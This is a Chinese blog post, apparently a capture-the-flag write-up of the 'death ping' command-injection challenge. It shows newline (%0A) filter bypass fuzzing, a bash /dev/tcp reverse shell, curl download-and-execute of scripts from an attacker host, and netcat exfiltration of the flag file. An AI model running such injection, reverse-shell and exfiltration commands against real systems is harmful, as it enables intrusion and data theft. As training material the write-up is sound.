从0到1:CTFer成长之路——死亡 Ping 命令

已于 2023-10-26 21:46:15 修改
阅读量442 收藏 4
点赞数 1
分类专栏: 渗透测试 文章标签: 网络安全 web安全 安全性测试 安全威胁分析 http
于 2023-10-26 20:25:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134064120
版权

死亡 ping 命令

绕过探测

  • 手动尝试

    image-20231026111651824

    image-20231026111706228

    image-20231026111721198

  • 脚本生成转义后的字符,后面拼接命令

    import urllib.parse

with open(r"C:\Users\LEGION\Desktop\RCE.txt", "w", encoding="utf-8") as f:
  for i in range(0, 255):
  	  encoded_str = urllib.parse.quote(chr(i)+"whoami")
  	  f.write(encoded_str + "\n")

    在这里插入图片描述

  • bp 爆破

    image-20231026160017488

  • 出现中文乱码

    image-20231026160821417

  • 设置编码

    image-20231026160849659

    image-20231026160537144

  • 爆破

    最终发现转义后的 %0A 拼接时未被过滤

    image-20231026161125093

漏洞发现

  • 发送到 Repeater 模块中查看,执行成功但并没有回显

    image-20231026161457031

  • 尝试 kali 开启 nc 监听,反弹 shell

    bash -i >& /dev/tcp/10.4.7.138/8888 0>&1

    image-20231026162156157

  • 命令中包含过滤字符

  • 开启另一个靶机,将命令写入 shell 文件尝试传入

    bash -i >& /dev/tcp/10.4.7.146/8888 0>&1

  • 开启 80 端口(docker 所在的靶机 80 端口被占用)

  • wget 下载失败(可能 docker 中未安装 wget)

    image-20231026200703266

  • curl 下载成功

    ip=%0Acurl 10.4.7.146/shell> /tmp/shell

    image-20231026200644416

  • 赋权

    ip=%0Achmod 777 /tmp/shell

    image-20231026200716932

  • 10.4.7.146 开启监听

    image-20231026200814244

  • 运行,反弹失败

    ip=%0A /tmp/shell

    image-20231026200834519

  • 查找资料说此 docker 未安装 bash、python 等,所以无法反弹 shell

flag 获取

  • 尝试直接回显

    ls | nc 10.4.7.146 8888
# 将 ls 查看的命令输出回显到 kali

    因为 | 会被过滤,所以使用同样的方法将命令写到 kali 的文件中,上传到靶机执行

  • 编辑文件

    image-20231026200916698

  • 上传

    ip=%0Acurl 10.4.7.146/ls > /tmp/ls

    image-20231026200947835

  • 赋权

    ip=%0Achmod 777 /tmp/ls

  • 执行

    ip=%0A/tmp/ls

    显示成功

    image-20231026201019390

    查看反弹的 kali

    成功反弹回 ls 的执行结果

    image-20231026201144696

  • 接下来就是一个个命令上传,浏览附录

    image-20231026201502881

    bp 中依次发送包

    ip=%0Acurl 10.4.7.146/ls2 > /tmp/ls2

ip=%0Achmod 777 /tmp/ls2

ip=%0A/tmp/ls2

    image-20231026201726723

  • 最终发现 flag 在根下

    查看 flag

    上传查看 flag 的脚本

    cat /FLAG | nc 10.4.7.146 8888

    image-20231026201925518

    ip=%0Acurl 10.4.7.146/cat > /tmp/cat

ip=%0Achmod 777 /tmp/cat

ip=%0A/tmp/cat

    image-20231026202046104

    image-20231026202056904

  • 成功拿到 falg

    n1book{6fa82809179d7f19c67259aa285a7729}
gjl_
关注
专栏目录
bash: ping: command not found解决方案
weixin_43178406的博客
05-13 4万+
本文主要介绍了bash: ping: command not found解决方案,希望能对使用Linux ping命令的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
weixin_46703850的博客
02-26 3492
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
BUUCTF--[第二章 web进阶]死亡ping命令
qq_45414878的博客
11-13 7616
BUUCTF–[第二章 web进阶]死亡ping命令 开启环境发现是一个ping的页面,并且过滤了许多字符 fuzz测试如下
[SWPUCTF 2023 秋季新生赛]Pingpingping
最新发布
dalaojiaoweb的博客
09-04 439
在payload中我们使用了“||”符号,“||” 是一个管道操作符,它用于在命令行中执行多个命令,当前一个命令执行成功时,才会执行后一个命令。这里我测试的是任何ip都可以。可以看到我们这里面的ping命令形式是不完整的,所以我们必须要先补全我们的ping命令再进行cat命令抓取。那么很明了的思路就是使用我们的cat命令抓取我们的flag。,它被转化为_之后,后面的字符就会被保留下来不会被替换。直接给出了我们的源代码,我来简单的进行一些代码解说。所以我们必须先转义前面的字符,以防止后面的点被转义。
[实验室每日一题][20201123][Web]死亡ping命令
m0_50317371的博客
12-02 3866
原题目:BUUCTF–[第二章 web进阶]死亡ping命令 前置基础(本题会用到的相关命令) liunx命令 ls命令 Linux ls(英文全拼:list files):命令用于显示指定工作目录下之内容(列出目前工作目录所含之文件及子目录)。 转自:菜鸟教程 cat命令 cat(英文全拼:concatenate):命令用于连接文件并打印到标准输出设备上。 转自:菜鸟教程 curl命令 curl(英文全拼:CommandLine Uniform Resource Locator):curl 是常用的命令
从0到1——CTFer成长之路(一)
youngerll的博客
03-08 4129
这里写自定义目录标题从0到1——CTFer成长之路(一)Docker安装 从0到1——CTFer成长之路(一) 此书将习题放在docker上,想做习题要先布置docker环境。 Docker安装 Windows商业版可以直接安装,懒得做系统,家庭版可以在VM虚拟机中直接安装。 下载ubuntu20系统及VM15; 安装docker。 ubuntu系统安装: 1.选择英语可以避免后期安装软件改文路径名称。 2.接着是漫长的等待; 3.等待完,右键桌面打开终端。 4.docker安装 ①终端apt
从0到1:CTFer成长之路死亡ping命令
一个努力学习网安的小牛马
10-26 236
死亡ping命令
死亡ping
天道酬勤
11-08 534
h3ping
BUU N1BOOK [第二章 web进阶]死亡ping命令
SwBack的博客
09-02 2390
存在以下黑名单过滤 ["$", "{", "}", "`", ";", "&", "|", "(", ")", "\"","'", "~", "!", "@", "#", "%", "^", "*", "[", "]", "\\", ":", "-", "_"]; 但是发现%0a可以执行命令 准备工作 一台具备公网IP的服务器 我这里采用的是自己的服务器,没有服务器的可以注册个小号,在BUU平台开启如下环境 首先在公网服务器上面写入shell文件 内容如下 a=`cat /FLAG` c.
从0到1:CTFer成长之路
qq_61950442的博客
07-02 675
拉取仓库暂存git add .提交上传git push查看日志git log拉取远程修改git pull。
计算机网络原理实验4——PING命令的实现.docx
06-28
完整的实验报告,其中代码完整,有运行结果截图,学校是NPU,10院
死亡Ping.zip
10-24
本工具仅用于 技术研究 请勿用来做非法用途
计算机网络课程设计——Tracert与Ping的程序设计
03-15
Tracert 命令使用用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。 2)Ping命令测试主机是否可达命令。主要是向特定的目的主机发送 ICMP(Internet Control Message Protocol ...
从0到1:CTFer成长之路-PWN篇
07-30 298
格式化字符串不在栈上的利用方式, 参数在 .bss 段,不在栈上条件: 需要多次可输入参数。
从0到1:CTFer成长之路(笔记不断更新)
hxhxhxhxx的博客
01-26 5855
ctfer从0到1web入门信息搜集 web入门 信息搜集 敏感目录 敏感备份文件 Banner识别
死亡ping命令
2301_79118231的博客
10-27 385
注:个人笔记,并不详细,仅供参考。
BUUCTF---死亡Ping详解
qq_49422880的博客
05-25 3615
BUUCTF-GXYCTF2019 ping ping ping前言知识点总结关于通配符总结 前言  &esmp;昨晚半夜在一个大佬的博客里看到了个名叫BUUCTF的一个刷题的地方,心想大佬都在上面玩,我这波怎么不得在上面留下自己的痕迹,第二天就直接上手,也就遇到了ping 这题,这不简单直接连刷两题,因为之前也接触过关于ping的题,然而就在GXYCTF2019上的一篇WP上,刷新了我对绕过的认识,于是乎写下本博客记录所学知识点。 知识点总结 先上题目为敬: 疯狂暗示!!!首先我们这里先随便测
命令执行漏洞--死亡ping
m0_62202418的博客
11-26 675
添加编码类型为Encode下的URL-encode key characters。利用Python中的string模块,输出键盘上所有能打印的字符。然后将字符添加到character set中,用来替换变量。通过curl命令将脚本下载到服务器中的 /tmp目录下。chmod +x /tmp/re.sh进行URL编码。能够curl成功,说明%0a后面的命令执行成功。curl一下kali的IP,进行URL编码。sh /tmp/re.sh进行URL编码。%0a代表换行回车,也可以用来连接命令
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值